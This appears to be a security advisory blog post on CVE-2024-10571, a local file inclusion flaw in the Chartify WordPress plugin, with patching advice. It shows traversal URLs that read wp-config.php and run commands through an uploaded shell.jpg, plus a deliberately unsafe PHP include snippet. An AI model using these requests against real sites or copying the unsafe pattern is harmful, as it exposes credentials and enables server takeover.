CVE-2024-10571 - Local File Inclusion (LFI) Flaw in Chartify – WordPress Chart Plugin

CVE-2024-10571 identifies a serious Local File Inclusion (LFI) vulnerability in the Chartify – WordPress Chart Plugin, affecting all versions up to and including 2.9.5. This flaw allows remote, unauthenticated attackers to include and execute arbitrary files on the server using the source parameter in plugin requests. The impact ranges from reading sensitive files, bypassing protections, leaking credentials, or in some situations, gaining direct code execution.

In this article, we break down how the exploit works, demo proof of concept (PoC) code, analyze real-world risks, and provide references for further reading.

Vulnerable Component

Plugin: Chartify – WordPress Chart Plugin
Affected versions: ≤ 2.9.5
Vulnerable parameter: source
Vulnerability type: Local File Inclusion (LFI)

How the Vulnerability Works

The vulnerable parameter source is not properly sanitized, allowing input from the web request to directly influence which files are loaded and included by PHP. An attacker can manipulate the request to point to sensitive files or uploaded files that contain PHP code. If the server allows file uploads (like images), attackers could upload a malicious “image” and include it via this LFI.

Here’s a simple example of exploiting the vulnerability using a browser or tools like curl

http://example.com/wp-content/plugins/chartify/includes/get_chart.php?source=../../../../../../wp-config.php

Explanation:
This tries to include the critical wp-config.php file. Since this file contains WordPress database credentials and secrets, leaking it is a major compromise.

Sample PHP Vulnerable Code (for illustration)

// get_chart.php
if (isset($_GET['source'])) {
    include($_GET['source']);
}

The above code naively trusts the user input. No filtering, no restriction on file types or directories—prime recipe for LFI.

File Upload + LFI

If your WordPress site allows unauthenticated file uploads (many do via media or other plugins), an attacker can upload a “.php” image file with embedded PHP code like:

`

http://example.com/wp-content/plugins/chartify/includes/get_chart.php?source=../../../../../../wp-content/uploads/2024/06/shell.jpg&cmd=whoami

Leaking sensitive files:

Files like /etc/passwd, wp-config.php, or other server-side files can be read.

Update Immediately:

Upgrade Chartify to the latest patched version.

References

- Official WordPress Plugin Page
- CVE-2024-10571 NVD Entry
- Wordfence Advisory on Chartify LFI
- General Guide: Understanding Local File Inclusion (LFI)

Conclusion

CVE-2024-10571 is a dangerous, easy-to-exploit issue in Chartify for WordPress. Anyone running the vulnerable plugin should patch immediately. The exploit is trivial—a single parameter, no login required, and public resources are enough. Always sanitize external inputs and practice the principle of least privilege for web applications.

Stay secure! If you have questions or need help, contact your hosting provider or a security professional.

Timeline

Published on: 11/14/2024 11:15:04 UTC
Last modified on: 11/19/2024 15:46:52 UTC